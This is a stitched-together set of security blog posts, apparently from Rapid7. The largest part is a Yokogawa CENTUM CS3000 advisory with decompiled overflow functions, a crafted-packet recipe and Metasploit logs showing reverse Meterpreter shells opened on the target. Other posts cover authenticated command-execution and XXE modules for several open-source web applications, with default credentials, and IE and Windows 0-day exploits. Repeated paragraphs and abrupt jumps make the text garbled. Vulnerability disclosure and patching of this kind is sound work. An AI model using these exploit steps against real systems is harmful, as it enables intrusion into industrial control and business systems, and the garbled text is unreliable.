        }
        *(_BYTE *)(i + a1) = 0;
        for ( result = v2 + 1; *(_BYTE *)result == '\n' || *(_BYTE *)result == '\r'; ++result )
          ;
      }
      else
      {
        result = 0;
      }
      return result;
    }

The dangerous loop keeps copying data from the buffer pointed to by the second argument to the buffer pointed to by the first argument, until a delimiter "\r" or "\n" is found.
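A bounded version of that line copy, added here as an example and not code from the advisory or from the vendor: it takes the destination capacity and the number of bytes actually available at the source, stops at "\r"/"\n" like the original, and refuses a line that would not fit or that never reaches a delimiter. The "::" early return and the "consume the trailing CR/LF run" behaviour are kept so a caller shaped like the one at 0041DAAD could use it unchanged; parse_lines and its inputs are constructed for illustration.

```c
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Bounded replacement for the line copy in sub_41EB60.
 *   dst_cap : full size of dst, including room for the NUL terminator
 *   src_len : bytes actually available at src (the original also reads
 *             past the end of src when no delimiter is present)
 * Returns the number of source bytes consumed (the line plus the trailing
 * run of '\r'/'\n'), 0 for a line starting with "::" (as the original
 * does), or -1 when the line does not fit in dst or has no delimiter. */
long copy_line_bounded(char *dst, size_t dst_cap, const char *src, size_t src_len)
{
    if (dst_cap == 0)
        return -1;
    if (src_len >= 2 && src[0] == ':' && src[1] == ':')
        return 0;

    size_t i = 0;
    while (i < src_len && src[i] != '\n' && src[i] != '\r') {
        if (i + 1 >= dst_cap)          /* would leave no room for the NUL */
            return -1;
        dst[i] = src[i];
        i++;
    }
    if (i == src_len)                  /* ran out of input before a delimiter */
        return -1;
    dst[i] = '\0';

    size_t end = i;                    /* skip the delimiter and any CR/LF run after it */
    while (end < src_len && (src[end] == '\n' || src[end] == '\r'))
        end++;
    return (long)end;
}

/* Walk a whole buffer line by line into a small fixed stack buffer, the
 * shape of the caller at 0041DAAD. Returns the number of lines accepted,
 * or -1 as soon as one line is rejected (hypothetical caller). */
int parse_lines(const char *data, size_t len)
{
    char line[32];
    size_t off = 0;
    int count = 0;
    while (off < len) {
        long used = copy_line_bounded(line, sizeof line, data + off, len - off);
        if (used < 0)
            return -1;
        if (used == 0)                 /* "::" sentinel: stop, as the original returns 0 */
            break;
        count++;
        off += (size_t)used;
    }
    return count;
}

int main(void)
{
    /* constructed inputs: two short lines, then 64 bytes with no delimiter */
    const char ok[] = "STATUS 1\r\nMODE A\n";
    char overlong[64];
    memset(overlong, 'A', sizeof overlong);
    printf("ok: %d lines\n", parse_lines(ok, sizeof ok - 1));
    printf("overlong: %d\n", parse_lines(overlong, sizeof overlong));
    return 0;
}
```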
By sending specially crafted data to the TCP/20171 port it's possible to reach the vulnerable copy function with the first argument pointing to a static size buffer stored on the stack (destination) and the argument (origin) pointing to an arbitrary user data: .text:0041DAAD mov eax, [esp+2280h+arg_4] ; user controlled data, user specified length (4 bytes) .text:0041DAB4 lea ecx, [esp+2280h+var_1D14] ; static buffer size on the stack .text:0041DABB push eax .text:0041DABC push ecx .text:0041DABD call vulnerable_sub_41EB60 It's possible to reach the vulnerable copy function by sending a specially crafted packet to TCP/20171. The packet must include a 16-byte fake header, where the bytes 4-7 allow setting an arbitrary data length: header = "ABCD" # iMark header << [data.length].pack("N") # Data length header << "IJKL" # NumSet header << "MN" # req header << "OP" # Unknown And the packet data, which can't contain "\r", "\n" or ":"" characters in order to trigger memory corruption. The arbitrary data must be longer than the static buffer size on the stack, of course. R7-2013-19.4 - BKBCopyD.exe Stack Based Buffer Overflow The vulnerability exists on the function “sub_409EA0” (IDA notation), used while parsing several commands accepted for the BKBCopyD.exe TCP/20111 service. The vulnerable function tries to store a received command (and its argument) on memory. But it uses a dangerous vsprintf call to store a temporary copy of the full command on the stack, where the size of the buffer is no longer enough to store commands with long arguments: int dangerous_sub_409EA0(int a1, const char *Format, ...) 
```c
{
  unsigned int v2; // edx@1
  int result; // eax@3
  char Dest; // [sp+8h] [bp-80h]@1
  va_list va; // [sp+94h] [bp+Ch]@1

  va_start(va, Format);
  vsprintf(&Dest, Format, va); // Dangerous vsprintf call
  v2 = strlen(&Dest);
  if ( (signed int)(dword_4230C0 + v2 + 1) > 1024 )
  {
    dword_4230C4 = (int)dword_4230C8;
    dword_4230C0 = 0;
  }
  strcpy((char *)dword_4230C4, &Dest);
  result = dword_4230C4 + v2 + 1;
  dword_4230C4 += v2 + 1;
  dword_4230C0 += v2 + 1;
  return result;
}
```

The vulnerable function is reachable through several commands which accept user-provided arguments, such as:

```asm
; STOR
.text:00405ED0 push eax ; Args
.text:00405ED1 push offset aStorS ; "STOR %s"
.text:00405ED6 push ecx ; int
.text:00405ED7 call dangerous_sub_409EA0

; RETR
.text:00405E1E push edx ; Args
.text:00405E1F push offset aRetrS ; "RETR %s"
.text:00405E24 push esi ; int
.text:00405E25 call dangerous_sub_409EA0

; PMODE
.text:004060A2 push eax ; Args
.text:004060A3 push offset aPmodeS ; "PMODE %s"
.text:004060A8 push ecx ; int
.text:004060A9 call dangerous_sub_409EA0

; ATTR
.text:004061D1 push ecx ; Args
.text:004061D2 push offset aAttrS ; "ATTR %s"
.text:004061D7 push esi ; int
.text:004061D8 call dangerous_sub_409EA0

; XATR
.text:0040627A push edx ; Args
.text:0040627B push offset aXatrS ; "XATR %s"
.text:00406280 push esi ; int
.text:00406281 call dangerous_sub_409EA0
```

By sending specially crafted data to the TCP/20171 port it's possible to reach the vulnerable copy function with the first argument pointing to a static-size buffer stored on the stack (destination) and the second argument (origin) pointing to arbitrary user data:

```asm
.text:0041DAAD mov eax, [esp+2280h+arg_4] ; user controlled data, user specified length (4 bytes)
.text:0041DAB4 lea ecx, [esp+2280h+var_1D14] ; static buffer size on the stack
.text:0041DABB push eax
.text:0041DABC push ecx
.text:0041DABD call vulnerable_sub_41EB60
```

Metasploit Modules

R7-2013-19.1 - BKCLogSvr.exe Heap Based Buffer Overflow

A proof of concept Metasploit module to trigger the Denial of Service condition has been developed. However, successful exploitation of the heap overflow could lead to arbitrary code execution with SYSTEM privileges.

```
msf > use auxiliary/dos/scada/yokogawa_logsvr
msf auxiliary(yokogawa_logsvr) > set RHOST 192.168.172.133
RHOST => 192.168.172.133
msf auxiliary(yokogawa_logsvr) > set verbose true
verbose => true
msf auxiliary(yokogawa_logsvr) > run
[*] Sending 10 packets...
[*] Sending 1/10...
[*] Sending 2/10...
[*] Sending 3/10...
[*] Sending 4/10...
[*] Sending 5/10...
[*] Sending 6/10...
[*] Sending 7/10...
[*] Sending 8/10...
[*] Sending 9/10...
[*] Sending 10/10...
[*] Auxiliary module execution completed
msf auxiliary(yokogawa_logsvr) >
```

R7-2013-19.3 - BKHOdeq.exe Stack Based Buffer Overflow

A working exploit has been developed for Yokogawa Centum CS3000 R3.08.50 (including DEP bypass in case it is needed), where it is possible to gain arbitrary code execution, with the CENTUM user privileges, by corrupting the SEH handler stored in the stack. By default, a run of the Metasploit module will return a shell on the targeted system:

```
msf > use exploit/windows/scada/yokogawa_bkhodeq_bof
msf exploit(yokogawa_bkhodeq_bof) > set rhost 192.168.172.133
rhost => 192.168.172.133
msf exploit(yokogawa_bkhodeq_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(yokogawa_bkhodeq_bof) > set lhost 192.168.172.1
lhost => 192.168.172.1
msf exploit(yokogawa_bkhodeq_bof) > exploit
[*] Started reverse handler on 192.168.172.1:4444
[*] Trying target Yokogawa Centum CS3000 R3.08.50 / Windows [ XP SP3 / 2003 SP2 ], sending 8689 bytes...
[*] Sending stage (769024 bytes) to 192.168.172.133
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.133:1185) at 2014-03-09 16:09:28 +0100
meterpreter > getuid
Server username: HIS0163\CENTUM
meterpreter > sysinfo
Computer : HIS0163
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...
```

R7-2013-19.4 - BKBCopyD.exe Stack Based Buffer Overflow

Exploitation has been confirmed at least with the commands STOR, RETR and PMODE. By sending a command with a long argument it's possible to overflow the EIP saved on the stack and gain code execution, since there isn't stack cookie protection on the vulnerable function. A working exploit has been developed for Yokogawa Centum CS3000 R3.08.50, where it is possible to gain arbitrary code execution, with the CENTUM user privileges, by sending a specially crafted RETR command. Again, shells are to be had:

```
msf > use exploit/windows/scada/yokogawa_bkbcopyd_bof
msf exploit(yokogawa_bkbcopyd_bof) > set RHOST 192.168.172.133
RHOST => 192.168.172.133
msf exploit(yokogawa_bkbcopyd_bof) > check
[*] The target service is running, but could not be validated.
msf exploit(yokogawa_bkbcopyd_bof) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(yokogawa_bkbcopyd_bof) > set LHOST 192.168.172.1
LHOST => 192.168.172.1
msf exploit(yokogawa_bkbcopyd_bof) > exploit
[*] Started reverse handler on 192.168.172.1:4444
[*] Trying target Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3, sending 458 bytes...
[*] Sending stage (770048 bytes) to 192.168.172.133
[*] Meterpreter session 1 opened (192.168.172.1:4444 -> 192.168.172.133:1384) at 2014-03-03 12:20:54 -0600
meterpreter > getuid
Server username: HIS0163\CENTUM
meterpreter > sysinfo
Computer : HIS0163
OS : Windows XP (Build 2600, Service Pack 3).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter > exit
[*] Shutting down Meterpreter...
[*] 192.168.172.133 - Meterpreter session cosed. Reason: User exit
```

Want to try this out for yourself? Get your free Metasploit download now or update your existing installation, and let us know if you have any further questions or comments.
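As an added example (not Yokogawa's code, nor Rapid7's), here is the BKBCopyD logging helper from the decompilation above rewritten with the two bounds checks it lacks, plus a helper that reports how many bytes the original unbounded vsprintf would have produced for a given command. The 1024-byte ring size is the limit in the decompiled check; the 128-byte scratch buffer size and the ring's variable names are assumptions.

```c
#include <stdarg.h>
#include <stddef.h>
#include <stdio.h>
#include <string.h>

/* Added example, not Yokogawa's or Rapid7's code: a bounds-checked rewrite of
 * the logging helper shown in the decompilation. RING_SIZE (1024) is the limit
 * the decompiled check compares against; SCRATCH_SIZE is an assumed size for
 * the stack buffer the original names Dest. */
#define SCRATCH_SIZE 128
#define RING_SIZE    1024

/* Globals standing in for dword_4230C8 (ring base), dword_4230C4 (cursor)
 * and dword_4230C0 (bytes in use). */
static char   log_ring[RING_SIZE];
static size_t log_cursor = 0;
static size_t log_used   = 0;

/* Number of bytes (excluding the NUL) an unbounded vsprintf of this format
 * would have written. Nothing is written anywhere: the length comes from
 * vsnprintf(NULL, 0, ...), so this is safe to call on any input. */
size_t bytes_original_would_write(const char *format, ...)
{
    va_list va;
    int n;

    va_start(va, format);
    n = vsnprintf(NULL, 0, format, va);
    va_end(va);
    return n < 0 ? 0 : (size_t)n;
}

/* Hardened replacement. Returns the number of bytes stored in the ring
 * (including the NUL), or 0 when the message was rejected. The two rejection
 * paths are exactly the two places the original could write out of bounds:
 * the stack scratch buffer (vsprintf) and the 1024-byte ring (strcpy). */
size_t log_message_safe(const char *format, ...)
{
    char    dest[SCRATCH_SIZE];
    va_list va;
    int     n;
    size_t  len;

    va_start(va, format);
    n = vsnprintf(dest, sizeof dest, format, va);   /* bounded, unlike vsprintf */
    va_end(va);

    if (n < 0)
        return 0;                        /* encoding error */
    if ((size_t)n >= sizeof dest)
        return 0;                        /* would have overflowed Dest: reject */

    len = (size_t)n + 1;                 /* include the terminating NUL */
    if (len > RING_SIZE)
        return 0;                        /* never copy more than the ring holds */

    if (log_used + len > RING_SIZE) {    /* same wrap rule as the original */
        log_cursor = 0;
        log_used   = 0;
    }
    memcpy(log_ring + log_cursor, dest, len);
    log_cursor += len;
    log_used   += len;
    return len;
}

/* Accessors so callers (and tests) can inspect the ring state. */
size_t      log_ring_bytes_used(void) { return log_used; }
const char *log_ring_base(void)       { return log_ring; }

/* Constructed sample input: an argument far longer than the scratch buffer,
 * the shape of input the advisory describes for the long-argument commands. */
#define LONG_ARG_LEN 599
const char *constructed_long_arg(void)
{
    static char buf[LONG_ARG_LEN + 1];
    if (buf[0] == '\0') {
        memset(buf, 'A', LONG_ARG_LEN);
        buf[LONG_ARG_LEN] = '\0';
    }
    return buf;
}

int main(void)
{
    printf("unbounded write for long RETR: %zu bytes (Dest holds %d)\n",
           bytes_original_would_write("RETR %s", constructed_long_arg()),
           SCRATCH_SIZE);
    printf("safe log of long RETR stored: %zu bytes\n",
           log_message_safe("RETR %s", constructed_long_arg()));
    printf("safe log of short RETR stored: %zu bytes\n",
           log_message_safe("RETR %s", "config.dat"));
    return 0;
}
```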

Federal Friday - 2.28.14 - Flash Zero Day Targets Foreign Policy Sites


Federal Friday has come again, which means another week has passed us by. It's been a busy week for the Moose of Rapid7 with an imminent move for our Boston HQ on the horizon. We also had a great week at RSA with SC Magazine naming Nexpose the Best Vulnerability Management Solution!

The threat landscape has had a wild few days with a major security flaw for Apple desktops and iOS devices as well as another IE zero day being discovered. In addition, a detailed report from FireEye pointed out a zero day vulnerability in Flash (CVE-2014-0502). This particular vuln targeted 3 non-profit institutions; as visitors went to their sites they were redirected to a server hosting the zero day exploit. According to the post by FireEye this is a targeted attack on a specific sector intended to gain additional user data as well as any information regarding public policy and defense. This nasty exploit targets computers with the following OS' and configurations:

- Windows XP
- Windows 7 and Java 1.6
- Windows 7 and out-of-date versions of MS Office 2007 or 2010

Not to be outdone, US-CERT put out an Alert about phishing campaigns that will be popping up and ongoing through the tax season. It's bad enough that doing your taxes can be stressful, especially if you know you're going to have to write a check to Uncle Sam, but now you need to watch out for these targeted campaigns. Keep in mind, while they cast a wide net, these campaigns will have the look and feel of an email coming from the IRS.

To help you protect yourself US-CERT listed the below steps:

- Do not follow links in unsolicited email messages.
- Visit the IRS page for instructions on how to report suspected tax season phishing messages.
- Keep antivirus software up to date.
- Refer to US-CERT's Security Tips on Recognizing and Avoiding Email Scams and Avoiding Social Engineering and Phishing Attacks for additional techniques and recommendations.

Less than 30 days until the boys of summer are back (I'm going to get some heat around here for this)...

Seven FOSS Tricks and Treats (Part Two)


Adventures in FOSS Exploitation, Part Two: Exploitation

This is part two of a pair of articles about disclosing vulnerabilities in a set of FOSS projects; see part one for some background on these vulnerabilities in particular, and some general advice for FOSS developers and maintainers.

A while back, I started a project to go over some of the top Sourceforge web applications and try to write some Metasploit modules for them. In the end, I was able to write seven new Metasploit modules (six exploits and one aux). Some of the modules take advantage of intended functionality, such as the Moodle module. Others take advantage of true security flaws, such as the Openbravo XXE module. I will go into detail for each module in this blog post.

I would like to especially thank todb for handling the vuln reporting for these modules, as I am lazy and just want to hack stuff. Props!

Moodle Authenticated Remote Command Execution (CVE-2013-3630)

Moodle is an open-source Learning Management System or Course Management System. It is used around the world by educational institutions, private enterprises, and governments alike and is a very good example of a solid open-source project. This year, as of this writing, Moodle has been downloaded from Sourceforge over 800,000 times. However, Moodle is easily installed from apt and yum as well.

This module exploits more of a design flaw than a bug, as the feature that is abused is meant to be there. This means that this isn't actually going to be fixed, but I will discuss mitigation later.

The module also has the ability to exploit a vulnerability. Moodle was recently found to have an XSS bug that allows a student (unprivileged user) to steal an admin's session key (the "sesskey"). You can log in with less-privileged credentials, but supply a sesskey for an admin. This allows the unprivileged user to have the authorization of the admin, which in turn allows the user to pop a shell. You can read more about this XSS vulnerability on Exploit-DB.

So, down to the nitty-gritty: how do you pop the shell? Within Moodle, an Administrator has the ability to specify a system path to the aspell binary on the filesystem that the TinyMCE editor will use for spell-checking. You can probably already see where this is going.

Basically, an attacker can specify an arbitrary command, ensure the editor will use the system aspell, and make a request to ask for a spell check. By default, it is not set to the correct value and you will need to ensure it is using the system aspell. When the request for a spell check is made, the command is run in the context of the web application. If you specify the username and password of any user, and a sesskey of an admin, the exploit will work in the exact same way.

You can use the config value "$CFG->preventexecpath = true" to mitigate this risk.

Disclosure Timeline (Moodle)

- Sat Aug 03, 2013: Initial discovery by internal researcher
- Sat Aug 03, 2013: Draft Metasploit module written
- Mon Aug 26, 2013: Initial contact to vendor
- Mon Aug 27, 2013: Bug filed at Moodle bug tracker as MDL-41449
- Wed Oct 30, 2013: Public Disclosure

Vtiger CRM Authenticated Remote Code Execution

This web application has been downloaded over 200,000 times this year from Sourceforge.

I found that an authenticated user (default creds admin:admin) could upload PHP source files with an extension of .php3 (.php was blocked) after manipulating a URL that the user is taken to during image uploading. By altering the URL (it is read-only, so you need to copy it to a new tab), you could navigate to an upload folder with fewer file restrictions than the image upload folder, and by uploading a PHP script to this folder, you could access the script remotely to have it run the arbitrary PHP code.

There are two vulnerabilities here that lead to successful exploitation. The first is that a user could navigate to an upload directory with fewer restrictions on allowed filetypes (non-images). The second is that this used an incomplete blacklist (restrict .php but not .php3). You can access the newly uploaded file directly on the web server and execute any PHP code you want.

Once I realised the workflow for exploitation, a Metasploit module was cake. The module is effective against versions 5.3.0 and 5.4.0 of VTiger CRM.

Disclosure Timeline (vTiger CRM)

- 2013-07-01: Vulnerability discovered by Brandon Perry, Rapid7
- 2013-07-01: Metasploit module written
- 2013-07-02: Disclosure first draft written
- 2013-07-03: Vendor contacted with disclosure and Metasploit module
- 2013-07-23: CERT/CC contacted with disclosure and Metasploit module
- 2013-09-05: Planned public disclosure (delayed)
- 2013-10-30: Public disclosure

Zabbix Authenticated Remote Command Execution (CVE-2013-3628)

Zabbix is enterprise-class open-source software for monitoring networks, similar to Nagios. It has been downloaded on Sourceforge almost 300,000 times this year so far.

This module abuses functionality within the application which allows an administrator to run scripts on hosts. By creating a host with an IP of 127.0.0.1 (it can already exist; the module will simply create a second one), you can then create a 'script' with an arbitrary command to be run on the Zabbix server, and call script_exec.php with the ID of the new host and the ID of the new script. This module uses the same vector of command execution as the module pyoor just got pushed into the framework, but uses real authentication as opposed to a SQL injection. This means mine will still work after the patch, with correct credentials. As it turns out, I found the vector around the same time as another researcher (Lincoln of corelan), independently. Funny how things like that work sometimes.

Disclosure Timeline (Zabbix)

- Sat Aug 24, 2013: Initial discovery by internal researcher
- Sat Aug 24, 2013: Draft Metasploit module written
- Mon Aug 26, 2013: Initial contact to vendor
- Wed Aug 28, 2013: Response from vendor, details provided
- Wed Sep 11, 2013: Disclosure to CERT/CC
- Wed Oct 30, 2013: Public Disclosure

Openbravo ERP Authenticated XXE (CVE-2013-3617)

Openbravo ERP is an open source project available on Sourceforge, downloaded over 134,000 times this year. It was vulnerable to an XXE (XML eXternal Entity) attack in the XML API. This allows an authenticated user to post specially-crafted XML to the XML API and read arbitrary files from the file system as the user the application is running as (generally not root).

If you aren't familiar with what an XXE attack is, I will explain it briefly. A great resource to read up more fully on this type of vulnerability is on the OWASP website. Basically, the default SAX parser used by many Java applications validates and expands, by default, entities defined within an external DTD. An attacker can create an external DTD within the XML request to a web service that will define new entities and where to look for them if referenced. When this request is parsed, the entities will be expanded on the server side to the values they are set to be expanded to. You can set these to expand to local files on the file system, thus replacing the entity with the contents of the file. This is the basic premise of the attack.

Openbravo ERP is a Java application that provides an XML API to authenticated users. This is available at the URI /ws/dal/<ENDPOINT>. Each endpoint represents a specific entity within the Openbravo data access layer. The module by default uses the ADUser endpoint because you will eventually find a user you can edit (yourself) and persist with the new value. Each class represented by the endpoints seems to share at least one property, a comment. This field seems to be postable with free-form text across all the endpoints I tried (Product is another). The module uses this field to store the value of the file, then requests the updated entity from the endpoint with a GET and parses the comment field. I do try to remain stealthy, so I remove the file from the comments field when done. You have the ability to set the endpoint you want to use in the options for the module (ENDPOINT, by default ADUser).

Disclosure Timeline (Openbravo ERP)

- Mon Jul 22, 2013: Initial discovery by internal researcher
- Mon Jul 29, 2013: Draft advisory written
- Tue Aug 06, 2013: Initial contact to vendor
- Tue Aug 06, 2013: Automatic response for issue 22813
- Tue Aug 13, 2013: PGP key provided, disclosure sent to vendor
- Wed Aug 26, 2013: Disclosure to CERT/CC
- Thu Aug 27, 2013: VU#533894 assigned by CERT/CC
- Wed Sep 04, 2013: Planned public disclosure (Delayed)
- Wed Oct 30, 2013: Public Disclosure
- Wed Oct 30, 2013: CERT/CC VU published

ISPConfig Authenticated Remote Code Execution (CVE-2013-3629)

ISPConfig is an open source hosting control panel written in PHP that allows for easy management of resellers and clients of internet cloud space and the like.

An administrator (default creds admin:admin) on ISPConfig has the ability to import and export language definition files. These files contain snippets of PHP code that get evaluated and executed in order to persist the correct language values. An attacker can abuse this by uploading a specially crafted file with arbitrary PHP code.

The Metasploit module I have written to take advantage of this is called ispconfig_php_exec and allows the attacker to define the language that will inevitably be overwritten (so don't choose the main language, otherwise it will be apparent something is wrong). While the vendor has stated they have added mitigations to later versions than 3.0.5.2 (which I was testing on at first), the module still works against the latest release.

Disclosure Timeline (ISPConfig)

- Mon Jul 29, 2013: Initial discovery by internal researcher
- Mon Aug 29, 2013: Draft Metasploit module written
- Mon Aug 26, 2013: Initial contact to vendor
- Tue Aug 27, 2013: Vendor response with PGP key
- Tue Aug 27, 2013: Vendor provided with full details
- Wed Sep 04, 2013: Vendor provided a fix
- Wed Sep 12, 2013: Disclosure to CERT/CC
- Wed Oct 30, 2013: Public Disclosure

OpenMediaVault Authenticated Remote Command Execution (CVE-2013-3632)

OpenMediaVault is an open-source Debian distribution for network attached storage devices. Available on Sourceforge, it has been downloaded over 500,000 times this year as of this writing.

OpenMediaVault allows you to create cron jobs as users (including root). This module abuses this to create a cron job to run whatever arbitrary command the authenticated attacker (default creds admin:openmediavault) wants to run.

Disclosure Timeline (OpenMediaVault)

- Thu Aug 01, 2013: Initial discovery by internal researcher
- Thu Aug 01, 2013: Draft Metasploit module written
- Mon Aug 26, 2013: Initial contact to vendor
- Tue Aug 27, 2013: Vendor response with PGP key
- Tue Aug 27, 2013: Vendor provided with full details
- Wed Sep 11, 2013: Vendor response
- Wed Sep 12, 2013: Disclosure to CERT/CC
- Wed Oct 30, 2013: Public Disclosure

NAS4Free Authenticated Remote Code Execution (CVE-2013-3631)

NAS4Free is an open-source BSD distribution for network attached storage devices. Available on Sourceforge, it has been downloaded nearly 350,000 times this year as of this writing. NAS4Free is a direct continuation of development of FreeNAS, just under a different name (due to legal circumstances).

A feature offered by NAS4Free to authenticated users (default creds admin:nas4free) is to run arbitrary PHP code (what could go wrong?). It also offers to run bash commands, but the bash environment is very limited and no connect-backs were viable via this vector.

This module simply takes advantage of this feature to pop a shell with PHP. I noticed that PHP meterpreter did not work properly, and settled on using the simpler php/reverse_php payload for most of my testing.

Disclosure Timeline (NAS4Free)

- Fri Aug 02, 2013: Initial discovery by internal researcher
- Fri Aug 05, 2013: Draft Metasploit module written
- Mon Aug 26, 2013: Initial contact to vendor
- Wed Aug 28, 2013: Disclosure to vendor
- Wed Sep 12, 2013: Disclosure to CERT/CC
- Wed Oct 30, 2013: Public Disclosure
- Wed Oct 30, 2013: CERT/CC VU published

Federal Friday - 10.18.2013 - The "We're Back In Business" Edition


After a tough start to FY14, a sense of normalcy should start to creep back in over the coming weeks. Even though the folks in the House and Senate merely delayed their budgetary discussions, we can only hope that some hard lessons were learned this time around and that come January our collective backs won't be up against the wall again. Unfortunately the under-valued thespian, Nicolas Cage, won't be representing my feelings in this week's blog as we have some things to talk about.

One of the big concerns stemming from the shutdown was who was deemed essential and who wasn't. Unfortunately for most agencies their cyber teams were not considered essential, with some exceptions. All in all though, we were left fairly exposed during the shutdown for a number of reasons. While skeleton crews were in place to keep systems running and monitor the networks, the human element was effectively taken away for 3 weeks. They were made to rely instead on a single individual to monitor complex security deployments that typically require a team of specifically trained individuals to run effectively. Additionally, due to the extended length of the shutdown, attackers were given plenty of time to search for vulnerable critical systems. While strict firewall standards may be in place, the maintenance (updates, patching etc.) has gone unchecked. There was also a release of two IE Zero Day patches during the 16 days Washington was closed which could have a major impact if they remain unapplied, potentially putting networks of all sizes at risk.

The other issue, which I find astounding, is that by leaving behind "essential" employees you have given skilled phishers their prime targets. Highlighting the importance of these individuals is like giving Ahab a white whale fish finder in Moby Dick. My suggestion upon returning to work, aside from the mountains of catch-up you will be doing, is to run some social engineering campaigns against those employees that were tasked to be in-office during the shutdown. If they're vulnerable to your tactics they could then be a honey-pot for future attacks, especially given the "essential" tag they've been given.

There were two great articles on the hit Cybersecurity took during the lockout which you can find here and here.

To make sure you end your week the right way we have the return of the Panda Cam, so sit back and watch as these cuddly creatures possibly make an appearance (no guarantees).

IE 0-day: exploit code is now widely available (CVE-2013-3893)


Any newly discovered Internet Explorer zero day vulnerability is bad for users. But once the exploit code gets around to public disclosure sites, it's so much worse. In the past day or so exploit code has been submitted to virustotal.com and scumware.org. Users and administrators should take immediate action to mitigate the risk posed by CVE-2013-3893. Considering the timing, I personally expect to see an out-of-band patch from Microsoft before October's Patch Tuesday, but that is just speculation.

Exploitation in the wild still seems limited to IE 8 and 9, and the exploit which is circulating seems to also rely on MS Office being present (not clear why, as yet). However, all versions of IE are affected by this issue, which means that this vulnerability has likely been present since IE 6 was released in 2001. The fact that it is getting attention now is due either to a noticeable volume or to the impact of active exploitation in the wild. It may have just been discovered last week, or it may have been in the private toolkit of the world's best malware writers for more than a decade.

This is about to become as severe as any browser issue can be. There were reports of regionally restricted public exploitation of the issue, but now that the exploit code is in the wild it's only a matter of time before it appears in commercial malware packs and broader exploitation. The vulnerability allows the attacker to gain the privileges of the user. All too often on Windows that means Administrator level privileges, but I would speculate that the exploit looking for MS Office could mean that it is being used with another privilege elevation vulnerability in Office. The mantra "I only visit safe sites" is a false promise of protection, as it's far too easy to misdirect, redirect, or otherwise cause a user to interact with a site that they are not expecting to. Legitimate sites may also be compromised to host malware serving this exploit.

The simplest way to avoid this risk is to use a browser other than Internet Explorer. Users who must use Internet Explorer should install all available Internet Explorer patches, and only use the latest versions available. Neither of those things will directly help with this specific issue, but they are good practices and prerequisites for the following actions to be at all effective.

To mitigate the risk of exploitation from this issue, install EMET 4.0, configure it to force ASLR, and enable a number of heap spraying and ROP protections. Additionally, there is a "fixit" available from Microsoft which will attempt to modify the system to prevent exploitation. Fixits are not full-fledged patches which have gone through Microsoft's generally rigorous quality assurance, so there is a risk that it's not a complete solution or that it could cause compatibility issues with other products (details on both can be found here). Personally I would do both: install and configure EMET, and apply the fixit.

Metasploit Update: Weaponizing Local Exploits


Weaponizing Local Exploits

This week's update features an exploit for Tavis @taviso Ormandy's vulnerability in the EPATHOBJ::pprFlattenRec function, which lives in win32k.sys on pretty much any Windows machine you're likely to run into. A whole lot of people threw in on this module to make this exploit reliable in Metasploit -- Tavis and progmboy wrote the original C exploit, new contributor @Keebie4e ported it to a Metasploit module, then a whole bunch of people threw in (and continue to do so) to make this exploit more and more stable. You can follow along at home by scrolling through PR #2036. I don't usually point at specific pull requests, but this one offers a pretty neat glimpse into how vulns become modules around here. If you're interested in exploit development, these are the kinds of discussions that are invaluable to follow along with.

Oh, and incidentally, there's no patch yet for this particular issue, so it's effectively 0-day. While it's "only" a privilege escalation, penetration testers pretty routinely need some way to elevate from a local user privilege level to local system (and from there, it's but a hop, skip and jump away from Domain Administrator, thanks to the miracle of Mimikatz credential dumping).

Further, consider the power of an exploit like this when combined with, say, the latest Java exploit from Adam Gowdiak and Matthias Kaiser. What this means is that any malicious web server out on the Internet has a pretty straight shot at a whole lot of internal Windows networks.

That's pretty bad. Many, many domain administrators are now at the mercy of the next (secret, unpublished) client-side exploit. Hopefully, with the publication of this vulnerability, defenders (and Microsoft) will come up with a decent solution sooner rather than later. In the meantime, it seems like offensive security has the upper hand at the moment. Now might be a good time to check your defense in depth strategies...

New Modules

We've got five new modules this week, including the two referenced above. What can I say, the security community tends to get a little quiet in early July, as everyone finalizes their Bsides / BlackHat / DefCon material.

- SMTP Open Relay Detection by Campbell Murray
- Java Applet ProviderSkeleton Insecure Invoke Method by Adam Gowdiak and Matthias Kaiser exploits CVE-2013-2460
- Carberp Web Panel C2 Backdoor Remote PHP Code Execution by Steven K, bwall (Brian Wallace), and connection (Luis Santana)
- Windows EPATHOBJ::pprFlattenRec Local Privilege Escalation by sinn3r, juan vazquez, egyp7, Keebie4e, Meatballs, Tavis Ormandy, and progmboy exploits CVE-2013-3660
- Windows Manage Trojanize Support Account by salcho

Availability

If you're new to Metasploit, you can get started by downloading Metasploit for Linux or Windows. If you're already tracking the bleeding-edge of Metasploit development, then these modules are but an msfupdate command away. For readers who prefer the packaged updates for Metasploit Community and Metasploit Pro, you'll be able to install the new hotness today when you check for updates through the Software Updates menu under Administration.

For additional details on what's changed and what's current, please see Brandont's most excellent release notes.

Department of Labor IE 0-day Exploit (CVE-2013-1347) Now Available at Metasploit


Recently, the U.S. Department of Labor website was compromised and had been serving malicious code, capable of detecting and disabling some antivirus products such as Avira, F-Secure, Kaspersky, AVG, Sophos, etc.  It would also attack Internet Explorer 8 users with an 0-day exploit.  The Metasploit vulnerability research community was particularly interested in the exploit part, therefore that's what we'd like to talk about in this blog. Understanding how the evolving browser security landscape operates is key to formulating defense strategies, after all. First off, according to Microsoft's advisory, only Internet Explorer 8 is vulnerable to this exploit, and we verified that with a fully patched Windows 7 with IE8.  If you are looking for an excuse to upgrade to something more recent, the following image demonstrates IE8's weakness: ![](/content/images/post-images/17009/Screen Shot 2013-05-04 at 11.44.20 PM.png) Some people say this is a CVE-2012-4792 (a patched vulnerability), we beg to differ.  CVE-2012-4792 is a cbutton use-after-free, but the DoL exploit doesn't use this object at all (Exodus has an excellent writeup about that vulnerability).  Instead, a mshtml!CGenericElement::`vtable' is created while appending a datalist element: Allocating 0x4C bytes from InsertElementInternal: 0x0563cfb0 ... 
